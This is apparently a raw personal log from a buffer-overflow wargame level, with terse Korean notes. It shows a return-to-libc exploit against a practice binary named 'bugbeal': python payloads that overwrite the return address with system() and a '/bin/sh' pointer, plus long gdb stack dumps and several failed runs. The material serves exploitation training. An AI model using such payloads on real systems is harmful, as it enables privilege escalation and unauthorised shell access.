darkknight / new attacker

run을 안하면 기본적인 것만 보여주고
run을 해야 세부도 보여줌


`python -c 'print "bin/sh"+"\x00"+"A"*37+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'`
`python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "bin/sh"+"\x00"+"BABABABABABABABAB"'`
`python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABAB"+"/bin/sh\x00"'`

\x68\x73\x2f\x6e\x69\x62

왜 버퍼에 bin/sh을 넣지 않는가? -> 내블로그


`python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x38\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABAB"+"/bin/sh\x00"'`














































0xbffffa6b:	 ""
0xbffffa6c:	 ""
0xbffffa6d:	 ""
0xbffffa6e:	 ""
0xbffffa6f:	 ""
0xbffffa70:	 ""
0xbffffa71:	 ""
0xbffffa72:	 ""
0xbffffa73:	 ""
0xbffffa74:	 ""
0xbffffa75:	 ""
0xbffffa76:	 ""
0xbffffa77:	 ""
0xbffffa78:	 ""
0xbffffa79:	 ""
0xbffffa7a:	 ""
0xbffffa7b:	 ""
0xbffffa7c:	 ""
0xbffffa7d:	 ""
0xbffffa7e:	 ""
0xbffffa7f:	 ""
0xbffffa80:	 ""
0xbffffa81:	 ""
0xbffffa82:	 ""
0xbffffa83:	 ""
0xbffffa84:	 ""
0xbffffa85:	 ""
0xbffffa86:	 ""
0xbffffa87:	 ""
0xbffffa88:	 ""
0xbffffa89:	 ""
0xbffffa8a:	 ""
0xbffffa8b:	 ""
(gdb) 
0xbffffa8c:	 ""
0xbffffa8d:	 ""
0xbffffa8e:	 ""
0xbffffa8f:	 ""
0xbffffa90:	 ""
0xbffffa91:	 ""
0xbffffa92:	 ""
0xbffffa93:	 ""
0xbffffa94:	 ""
0xbffffa95:	 ""
0xbffffa96:	 ""
0xbffffa97:	 ""
0xbffffa98:	 ""
0xbffffa99:	 ""
0xbffffa9a:	 ""
0xbffffa9b:	 ""
0xbffffa9c:	 ""
0xbffffa9d:	 ""
0xbffffa9e:	 ""
0xbffffa9f:	 ""
0xbffffaa0:	 ""
0xbffffaa1:	 ""
0xbffffaa2:	 ""
0xbffffaa3:	 ""
0xbffffaa4:	 ""
0xbffffaa5:	 ""
0xbffffaa6:	 ""
0xbffffaa7:	 ""
0xbffffaa8:	 'A' <repeats 12 times>, "¨
0xbffffab7:	 "¿"
0xbffffab9:	 "\001@\002"
0xbffffac2:	 ""
0xbffffac3:	 ""
0xbffffac4:	 "\200\203\004\b"
0xbffffac9:	 ""
0xbffffaca:	 ""
0xbffffacb:	 ""
0xbffffacc:	 "¡\203\004\b0\204\004\b\002"
0xbffffad6:	 ""
0xbffffad7:	 ""
(gdb) r `python -c 'print "AB"*22+"\xe0\x8a\x05\x40"+"AAAA"+"\xa8\xfa\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/darkknight/bugbeal `python -c 'print "AB"*22+"\xe0\x8a\x05\x40"+"AAAA"+"\xa8\xfa\xff\xbf"'`
ABABABABABABABABABABABABABABABABABABABABABABɀAAAA¨

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `python -c 'print "AB"*22+"\xe0\x8a\x05\x40"+"AAAA"+"\xa8\xfa\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/darkknight/bugbeal `python -c 'print "AB"*22+"\xe0\x8a\x05\x40"+"AAAA"+"\xa8\xfa\xff\xbf"'`
ABABABABABABABABABABABABABABABABABABABABABABɀAAAA¨

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/40x $esp-40 
0xbffffa8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa9c:	0x00000000	0x00000000	0x00000000	0x42414241
0xbffffaac:	0x42414241	0x41414141	0xbf00faa8	0xbffffb00
0xbffffabc:	0x40013868	0x00000002	0x08048380	0x00000000
0xbffffacc:	0x080483a1	0x08048430	0x00000002	0xbffffaf4
0xbffffadc:	0x080482e0	0x080484dc	0x4000ae60	0xbffffaec
0xbffffaec:	0x40013e90	0x00000002	0xbffffbed	0xbffffc06
0xbffffafc:	0x00000000	0xbffffc3d	0xbffffc5f	0xbffffc69
0xbffffb0c:	0xbffffc77	0xbffffc96	0xbffffca9	0xbffffcc2
0xbffffb1c:	0xbffffce2	0xbffffd01	0xbffffd0c	0xbffffd1a
(gdb) 
0xbffffb2c:	0xbffffd60	0xbffffd76	0xbffffd8b	0xbffffd9b
0xbffffb3c:	0xbffffdab	0xbffffdcd	0xbffffde7	0xbffffdf2
0xbffffb4c:	0xbffffe03	0xbffffe18	0xbffffe20	0x00000000
0xbffffb5c:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb6c:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb7c:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb8c:	0x00000009	0x08048380	0x0000000b	0x00000200
0xbffffb9c:	0x0000000c	0x00000200	0x0000000d	0x00000200
0xbffffbac:	0x0000000e	0x00000200	0x00000010	0x0fabfbff
0xbffffbbc:	0x0000000f	0xbffffbe8	0x00000000	0x00000000
(gdb) 
0xbffffbcc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbdc:	0x00000000	0x00000000	0x00000000	0x36383669
0xbffffbec:	0x6f682f00	0x642f656d	0x6b6b7261	0x6867696e
0xbffffbfc:	0x75622f74	0x61656267	0x4241006c	0x42414241
0xbffffc0c:	0x42414241	0x42414241	0x42414241	0x42414241
0xbffffc1c:	0x42414241	0x42414241	0x42414241	0x42414241
0xbffffc2c:	0x42414241	0x8ae04241	0x41414005	0xfaa84141
0xbffffc3c:	0x53454c00	0x45504f53	0x2f7c3d4e	0x2f727375
0xbffffc4c:	0x2f6e6962	0x7373656c	0x65706970	0x2068732e
0xbffffc5c:	0x55007325	0x4e524553	0x3d454d41	0x53494800
(gdb) x/40x $esp-42
0xbffffa8a:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa9a:	0x00000000	0x00000000	0x00000000	0x42410000
0xbffffaaa:	0x42414241	0x41414241	0xfaa84141	0xfb00bf00
0xbffffaba:	0x3868bfff	0x00024001	0x83800000	0x00000804
0xbffffaca:	0x83a10000	0x84300804	0x00020804	0xfaf40000
0xbffffada:	0x82e0bfff	0x84dc0804	0xae600804	0xfaec4000
0xbffffaea:	0x3e90bfff	0x00024001	0xfbed0000	0xfc06bfff
0xbffffafa:	0x0000bfff	0xfc3d0000	0xfc5fbfff	0xfc69bfff
0xbffffb0a:	0xfc77bfff	0xfc96bfff	0xfca9bfff	0xfcc2bfff
0xbffffb1a:	0xfce2bfff	0xfd01bfff	0xfd0cbfff	0xfd1abfff
(gdb) 
0xbffffb2a:	0xfd60bfff	0xfd76bfff	0xfd8bbfff	0xfd9bbfff
0xbffffb3a:	0xfdabbfff	0xfdcdbfff	0xfde7bfff	0xfdf2bfff
0xbffffb4a:	0xfe03bfff	0xfe18bfff	0xfe20bfff	0x0000bfff
0xbffffb5a:	0x00030000	0x80340000	0x00040804	0x00200000
0xbffffb6a:	0x00050000	0x00060000	0x00060000	0x10000000
0xbffffb7a:	0x00070000	0x00000000	0x00084000	0x00000000
0xbffffb8a:	0x00090000	0x83800000	0x000b0804	0x02000000
0xbffffb9a:	0x000c0000	0x02000000	0x000d0000	0x02000000
0xbffffbaa:	0x000e0000	0x02000000	0x00100000	0xfbff0000
0xbffffbba:	0x000f0fab	0xfbe80000	0x0000bfff	0x00000000
(gdb) 
0xbffffbca:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbda:	0x00000000	0x00000000	0x00000000	0x36690000
0xbffffbea:	0x2f003638	0x656d6f68	0x7261642f	0x696e6b6b
0xbffffbfa:	0x2f746867	0x62677562	0x006c6165	0x42414241
0xbffffc0a:	0x42414241	0x42414241	0x42414241	0x42414241
0xbffffc1a:	0x42414241	0x42414241	0x42414241	0x42414241
0xbffffc2a:	0x42414241	0x42414241	0x40058ae0	0x41414141
0xbffffc3a:	0x4c00faa8	0x4f535345	0x3d4e4550	0x73752f7c
0xbffffc4a:	0x69622f72	0x656c2f6e	0x69707373	0x732e6570
0xbffffc5a:	0x73252068	0x45535500	0x4d414e52	0x48003d45
(gdb) 
0xbffffc6a:	0x53545349	0x3d455a49	0x30303031	0x534f4800
0xbffffc7a:	0x4d414e54	0x6f6c3d45	0x686c6163	0x2e74736f
0xbffffc8a:	0x61636f6c	0x6d6f646c	0x006e6961	0x4e474f4c
0xbffffc9a:	0x3d454d41	0x6b726164	0x67696e6b	0x52007468
0xbffffcaa:	0x544f4d45	0x534f4845	0x39313d54	0x36312e32
0xbffffcba:	0x33322e38	0x00312e35	0x4c49414d	0x61762f3d
0xbffffcca:	0x70732f72	0x2f6c6f6f	0x6c69616d	0x7261642f
0xbffffcda:	0x696e6b6b	0x00746867	0x4843414d	0x45505954
0xbffffcea:	0x3833693d	0x65722d36	0x74616864	0x6e696c2d
0xbffffcfa:	0x672d7875	0x5400756e	0x3d4d5245	0x72657478
(gdb) r `python -c 'print "bin/sh"+"\x00"+"A"*37+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/darkknight/bugbeal `python -c 'print "bin/sh"+"\x00"+"A"*37+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"'`
bin/sh

Program exited with code 07.
(gdb) p system
Cannot access memory at address 0x40058ae0
(gdb) r `python -c 'print A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"'` ABABABABABABABABABABABAB
Starting program: /home/darkknight/bugbeal `python -c 'print A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"'` ABABABABABABABABABABABAB
  File "<string>", line 1
    print A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"
                ^
SyntaxError: invalid syntax
ABABABABABABABABABABABAB

Program exited with code 031.
(gdb) r `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"'` ABABABABABABABABABABABAB
Starting program: /home/darkknight/bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x32\xfc\xff\xbf"'` ABABABABABABABABABABABAB
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA2
Xshell
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/40 $esp
0xbffffa94:	0xbf00fc32	0xbffffae4	0x40013868	0x00000003
0xbffffaa4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffab4:	0x00000003	0xbffffad4	0x080482e0	0x080484dc
0xbffffac4:	0x4000ae60	0xbffffacc	0x40013e90	0x00000003
0xbffffad4:	0xbffffbd4	0xbffffbed	0xbffffc24	0x00000000
0xbffffae4:	0xbffffc3d	0xbffffc5f	0xbffffc69	0xbffffc77
0xbffffaf4:	0xbffffc96	0xbffffca9	0xbffffcc2	0xbffffce2
0xbffffb04:	0xbffffd01	0xbffffd0c	0xbffffd1a	0xbffffd60
0xbffffb14:	0xbffffd76	0xbffffd8b	0xbffffd9b	0xbffffdab
0xbffffb24:	0xbffffdcd	0xbffffde7	0xbffffdf2	0xbffffe03
(gdb) 
0xbffffb34:	0xbffffe18	0xbffffe20	0x00000000	0x00000003
0xbffffb44:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffb54:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffb64:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffb74:	0x08048380	0x0000000b	0x00000200	0x0000000c
0xbffffb84:	0x00000200	0x0000000d	0x00000200	0x0000000e
0xbffffb94:	0x00000200	0x00000010	0x0fabfbff	0x0000000f
0xbffffba4:	0xbffffbcf	0x00000000	0x00000000	0x00000000
0xbffffbb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x69000000	0x00363836
(gdb) 
0xbffffbd4:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffbe4:	0x6775622f	0x6c616562	0x41414100	0x41414141
0xbffffbf4:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc04:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc14:	0x41414141	0x058ae041	0x41414140	0x00fc3241
0xbffffc24:	0x42414241	0x42414241	0x42414241	0x42414241
0xbffffc34:	0x42414241	0x42414241	0x53454c00	0x45504f53
0xbffffc44:	0x2f7c3d4e	0x2f727375	0x2f6e6962	0x7373656c
0xbffffc54:	0x65706970	0x2068732e	0x55007325	0x4e524553
0xbffffc64:	0x3d454d41	0x53494800	0x5a495354	0x30313d45
(gdb) 
0xbffffc74:	0x48003030	0x4e54534f	0x3d454d41	0x61636f6c
0xbffffc84:	0x736f686c	0x6f6c2e74	0x646c6163	0x69616d6f
0xbffffc94:	0x4f4c006e	0x4d414e47	0x61643d45	0x6e6b6b72
0xbffffca4:	0x74686769	0x4d455200	0x4845544f	0x3d54534f
0xbffffcb4:	0x2e323931	0x2e383631	0x2e353332	0x414d0031
0xbffffcc4:	0x2f3d4c49	0x2f726176	0x6f6f7073	0x616d2f6c
0xbffffcd4:	0x642f6c69	0x6b6b7261	0x6867696e	0x414d0074
0xbffffce4:	0x59544843	0x693d4550	0x2d363833	0x68646572
0xbffffcf4:	0x6c2d7461	0x78756e69	0x756e672d	0x52455400
0xbffffd04:	0x74783d4d	0x006d7265	0x54534f48	0x45505954
(gdb) 
0xbffffd14:	0x3833693d	0x41500036	0x2f3d4854	0x2f727375
0xbffffd24:	0x61636f6c	0x69622f6c	0x622f3a6e	0x2f3a6e69
0xbffffd34:	0x2f727375	0x3a6e6962	0x7273752f	0x3131582f
0xbffffd44:	0x622f3652	0x2f3a6e69	0x656d6f68	0x7261642f
0xbffffd54:	0x696e6b6b	0x2f746867	0x006e6962	0x454d4f48
0xbffffd64:	0x6f682f3d	0x642f656d	0x6b6b7261	0x6867696e
0xbffffd74:	0x4e490074	0x52545550	0x652f3d43	0x692f6374
0xbffffd84:	0x7475706e	0x53006372	0x4c4c4548	0x69622f3d
0xbffffd94:	0x61622f6e	0x55006873	0x3d524553	0x6b726164
0xbffffda4:	0x67696e6b	0x42007468	0x5f485341	0x3d564e45
(gdb) 
0xbffffdb4:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffdc4:	0x61622e2f	0x63726873	0x53494400	0x59414c50
0xbffffdd4:	0x3239313d	0x3836312e	0x3533322e	0x303a312e
0xbffffde4:	0x4c00302e	0x3d474e41	0x555f6e65	0x534f0053
0xbffffdf4:	0x45505954	0x6e696c3d	0x672d7875	0x5000756e
0xbffffe04:	0x2f3d4457	0x656d6f68	0x7261642f	0x696e6b6b
0xbffffe14:	0x00746867	0x564c4853	0x00323d4c	0x435f534c
0xbffffe24:	0x524f4c4f	0x6f6e3d53	0x3a30303d	0x303d6966
0xbffffe34:	0x69643a30	0x3b31303d	0x6c3a3433	0x31303d6e
0xbffffe44:	0x3a36333b	0x343d6970	0x33333b30	0x3d6f733a
(gdb) 
0xbffffe54:	0x333b3130	0x64623a35	0x3b30343d	0x303b3333
0xbffffe64:	0x64633a31	0x3b30343d	0x303b3333	0x726f3a31
0xbffffe74:	0x3b31303d	0x333b3530	0x31343b37	0x3d696d3a
0xbffffe84:	0x303b3130	0x37333b35	0x3a31343b	0x303d7865
0xbffffe94:	0x32333b31	0x632e2a3a	0x303d646d	0x32333b31
0xbffffea4:	0x652e2a3a	0x303d6578	0x32333b31	0x632e2a3a
0xbffffeb4:	0x303d6d6f	0x32333b31	0x622e2a3a	0x303d6d74
0xbffffec4:	0x32333b31	0x622e2a3a	0x303d7461	0x32333b31
0xbffffed4:	0x732e2a3a	0x31303d68	0x3a32333b	0x73632e2a
0xbffffee4:	0x31303d68	0x3a32333b	0x61742e2a	0x31303d72
(gdb) 
0xbffffef4:	0x3a31333b	0x67742e2a	0x31303d7a	0x3a31333b
0xbfffff04:	0x72612e2a	0x31303d6a	0x3a31333b	0x61742e2a
0xbfffff14:	0x31303d7a	0x3a31333b	0x7a6c2e2a	0x31303d68
0xbfffff24:	0x3a31333b	0x697a2e2a	0x31303d70	0x3a31333b
0xbfffff34:	0x3d7a2e2a	0x333b3130	0x2e2a3a31	0x31303d5a
0xbfffff44:	0x3a31333b	0x7a672e2a	0x3b31303d	0x2a3a3133
0xbfffff54:	0x327a622e	0x3b31303d	0x2a3a3133	0x3d7a622e
0xbfffff64:	0x333b3130	0x2e2a3a31	0x303d7a74	0x31333b31
0xbfffff74:	0x722e2a3a	0x303d6d70	0x31333b31	0x632e2a3a
0xbfffff84:	0x3d6f6970	0x333b3130	0x2e2a3a31	0x3d67706a
(gdb) 
0xbfffff94:	0x333b3130	0x2e2a3a35	0x3d666967	0x333b3130
0xbfffffa4:	0x2e2a3a35	0x3d706d62	0x333b3130	0x2e2a3a35
0xbfffffb4:	0x3d6d6278	0x333b3130	0x2e2a3a35	0x3d6d7078
0xbfffffc4:	0x333b3130	0x2e2a3a35	0x3d676e70	0x333b3130
0xbfffffd4:	0x2e2a3a35	0x3d666974	0x333b3130	0x2f003a35
0xbfffffe4:	0x656d6f68	0x7261642f	0x696e6b6b	0x2f746867
0xbffffff4:	0x62677562	0x006c6165	0x00000000	Cannot access memory at address 0xc0000000
(gdb) r `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "bin/sh"+"\x00"+"BABABABABABABABAB"'`'
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/darkknight/bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "bin/sh"+"\x00"+"BABABABABABABABAB"'`'
/bin/bash: unexpected EOF while looking for `''
/bin/bash: -c: line 2: syntax error

Program exited with code 02.
You can't do that without a process to debug.
(gdb) r `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "bin/sh"+"\x00"+"BABABABABABABABAB"'` 
Starting program: /home/darkknight/bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "bin/sh"+"\x00"+"BABABABABABABABAB"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA<
Xshell
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) q     
The program is running.  Exit anyway? (y or n) y
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "bin/sh"+"\x00"+"BABABABABABABABAB"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA<
sh: /sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA<n/sh'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/20 $esp
0xbffffab4:	0xbffffc3c	0xbffffb00	0x40013868	0x00000003
0xbffffac4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffad4:	0x00000003	0xbffffaf4	0x080482e0	0x080484dc
0xbffffae4:	0x4000ae60	0xbffffaec	0x40013e90	0x00000003
0xbffffaf4:	0xbffffbf6	0xbffffc00	0xbffffc39	0x00000000
(gdb) 
0xbffffb04:	0xbffffc40	0xbffffc55	0xbffffc6e	0xbffffc8d
0xbffffb14:	0xbffffcaf	0xbffffcbf	0xbffffe82	0xbffffea1
0xbffffb24:	0xbffffec1	0xbffffed6	0xbffffef8	0xbfffff03
0xbffffb34:	0xbfffff1d	0xbfffff30	0xbfffff38	0xbfffff42
0xbffffb44:	0xbfffff52	0xbfffff60	0xbfffff6e	0xbfffff7f
(gdb) 
0xbffffb54:	0xbfffff8a	0xbfffffa0	0xbfffffe6	0x00000000
0xbffffb64:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb74:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb84:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb94:	0x00000009	0x08048380	0x0000000b	0x00000200
(gdb) 
0xbffffba4:	0x0000000c	0x00000200	0x0000000d	0x00000200
0xbffffbb4:	0x0000000e	0x00000200	0x00000010	0x0fabfbff
0xbffffbc4:	0x0000000f	0xbffffbf1	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe4:	0x00000000	0x00000000	0x00000000	0x38366900
(gdb) 
0xbffffbf4:	0x2f2e0036	0x62677562	0x006c6165	0x41414141
0xbffffc04:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc14:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc24:	0x41414141	0x41414141	0x40058ae0	0x41414141
0xbffffc34:	0xbffffc3c	0x6e696200	0x0068732f	0x3d445750
(gdb) 
0xbffffc44:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffc54:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffc64:	0x2e383631	0x2e353332	0x4f480031	0x414e5453
0xbffffc74:	0x6c3d454d	0x6c61636f	0x74736f68	0x636f6c2e
0xbffffc84:	0x6f646c61	0x6e69616d	0x53454c00	0x45504f53
(gdb) 
0xbffffc94:	0x2f7c3d4e	0x2f727375	0x2f6e6962	0x7373656c
0xbffffca4:	0x65706970	0x2068732e	0x55007325	0x3d524553
0xbffffcb4:	0x6b726164	0x67696e6b	0x4c007468	0x4f435f53
0xbffffcc4:	0x53524f4c	0x3d6f6e3d	0x663a3030	0x30303d69
0xbffffcd4:	0x3d69643a	0x333b3130	0x6e6c3a34	0x3b31303d
(gdb) 
0xbffffce4:	0x703a3633	0x30343d69	0x3a33333b	0x303d6f73
0xbffffcf4:	0x35333b31	0x3d64623a	0x333b3034	0x31303b33
0xbffffd04:	0x3d64633a	0x333b3034	0x31303b33	0x3d726f3a
0xbffffd14:	0x303b3130	0x37333b35	0x3a31343b	0x303d696d
0xbffffd24:	0x35303b31	0x3b37333b	0x653a3134	0x31303d78
(gdb) 
0xbffffd34:	0x3a32333b	0x6d632e2a	0x31303d64	0x3a32333b
0xbffffd44:	0x78652e2a	0x31303d65	0x3a32333b	0x6f632e2a
0xbffffd54:	0x31303d6d	0x3a32333b	0x74622e2a	0x31303d6d
0xbffffd64:	0x3a32333b	0x61622e2a	0x31303d74	0x3a32333b
0xbffffd74:	0x68732e2a	0x3b31303d	0x2a3a3233	0x6873632e
(gdb) 
0xbffffd84:	0x3b31303d	0x2a3a3233	0x7261742e	0x3b31303d
0xbffffd94:	0x2a3a3133	0x7a67742e	0x3b31303d	0x2a3a3133
0xbffffda4:	0x6a72612e	0x3b31303d	0x2a3a3133	0x7a61742e
0xbffffdb4:	0x3b31303d	0x2a3a3133	0x687a6c2e	0x3b31303d
0xbffffdc4:	0x2a3a3133	0x70697a2e	0x3b31303d	0x2a3a3133
(gdb) 
0xbffffdd4:	0x303d7a2e	0x31333b31	0x5a2e2a3a	0x3b31303d
0xbffffde4:	0x2a3a3133	0x3d7a672e	0x333b3130	0x2e2a3a31
0xbffffdf4:	0x3d327a62	0x333b3130	0x2e2a3a31	0x303d7a62
0xbffffe04:	0x31333b31	0x742e2a3a	0x31303d7a	0x3a31333b
0xbffffe14:	0x70722e2a	0x31303d6d	0x3a31333b	0x70632e2a
(gdb) 
0xbffffe24:	0x303d6f69	0x31333b31	0x6a2e2a3a	0x303d6770
0xbffffe34:	0x35333b31	0x672e2a3a	0x303d6669	0x35333b31
0xbffffe44:	0x622e2a3a	0x303d706d	0x35333b31	0x782e2a3a
0xbffffe54:	0x303d6d62	0x35333b31	0x782e2a3a	0x303d6d70
0xbffffe64:	0x35333b31	0x702e2a3a	0x303d676e	0x35333b31
(gdb) 
0xbffffe74:	0x742e2a3a	0x303d6669	0x35333b31	0x414d003a
0xbffffe84:	0x59544843	0x693d4550	0x2d363833	0x68646572
0xbffffe94:	0x6c2d7461	0x78756e69	0x756e672d	0x49414d00
0xbffffea4:	0x762f3d4c	0x732f7261	0x6c6f6f70	0x69616d2f
0xbffffeb4:	0x61642f6c	0x6e6b6b72	0x74686769	0x504e4900
(gdb) 
0xbffffec4:	0x43525455	0x74652f3d	0x6e692f63	0x72747570
0xbffffed4:	0x41420063	0x455f4853	0x2f3d564e	0x656d6f68
0xbffffee4:	0x7261642f	0x696e6b6b	0x2f746867	0x7361622e
0xbffffef4:	0x00637268	0x474e414c	0x5f6e653d	0x44005355
0xbfffff04:	0x4c505349	0x313d5941	0x312e3239	0x322e3836
(gdb) 
0xbfffff14:	0x312e3533	0x302e303a	0x474f4c00	0x454d414e
0xbfffff24:	0x7261643d	0x696e6b6b	0x00746867	0x564c4853
0xbfffff34:	0x00323d4c	0x52455355	0x454d414e	0x4853003d
0xbfffff44:	0x3d4c4c45	0x6e69622f	0x7361622f	0x4f480068
0xbfffff54:	0x59545453	0x693d4550	0x00363833	0x54534948
(gdb) 
0xbfffff64:	0x455a4953	0x3030313d	0x534f0030	0x45505954
0xbfffff74:	0x6e696c3d	0x672d7875	0x5400756e	0x3d4d5245
0xbfffff84:	0x72657478	0x4f48006d	0x2f3d454d	0x656d6f68
0xbfffff94:	0x7261642f	0x696e6b6b	0x00746867	0x48544150
0xbfffffa4:	0x73752f3d	0x6f6c2f72	0x2f6c6163	0x3a6e6962
(gdb) 
0xbfffffb4:	0x6e69622f	0x73752f3a	0x69622f72	0x752f3a6e
0xbfffffc4:	0x582f7273	0x36523131	0x6e69622f	0x6f682f3a
0xbfffffd4:	0x642f656d	0x6b6b7261	0x6867696e	0x69622f74
0xbfffffe4:	0x3d5f006e	0x75622f2e	0x61656267	0x2f2e006c
0xbffffff4:	0x62677562	0x006c6165	0x00000000	Cannot access memory at address 0xc0000000
(gdb) q
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x3c\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh"+"\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA<
sh: /sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ Xshellgdbsaf
bash2: Xshellgdbsaf: command not found
[darkknight@localhost darkknight]$ gdb -c -q core 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...

"/home/darkknight/core": not in executable format: File format not recognized


/home/darkknight/-q: No such file or directory.
(gdb) q
[darkknight@localhost darkknight]$ gdb -q -c core 
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA<ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/40 $esp
0xbffffaa4:	0xbffffc3c	0xbffffa00	0x40013868	0x00000003
0xbffffab4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffac4:	0x00000003	0xbffffae4	0x080482e0	0x080484dc
0xbffffad4:	0x4000ae60	0xbffffadc	0x40013e90	0x00000003
0xbffffae4:	0xbffffbe5	0xbffffbef	0xbffffc28	0x00000000
0xbffffaf4:	0xbffffc40	0xbffffc55	0xbffffc6e	0xbffffc8d
0xbffffb04:	0xbffffcaf	0xbffffcbf	0xbffffe82	0xbffffea1
0xbffffb14:	0xbffffec1	0xbffffed6	0xbffffef8	0xbfffff03
0xbffffb24:	0xbfffff1d	0xbfffff30	0xbfffff38	0xbfffff42
0xbffffb34:	0xbfffff52	0xbfffff60	0xbfffff6e	0xbfffff7f
(gdb) 
0xbffffb44:	0xbfffff8a	0xbfffffa0	0xbfffffe6	0x00000000
0xbffffb54:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb64:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb74:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb84:	0x00000009	0x08048380	0x0000000b	0x00000200
0xbffffb94:	0x0000000c	0x00000200	0x0000000d	0x00000200
0xbffffba4:	0x0000000e	0x00000200	0x00000010	0x0fabfbff
0xbffffbb4:	0x0000000f	0xbffffbe0	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x36383669
(gdb) 
0xbffffbe4:	0x622f2e00	0x65626775	0x41006c61	0x41414141
0xbffffbf4:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc04:	0x41414141	0x41414141	0x41414141	0x41414141
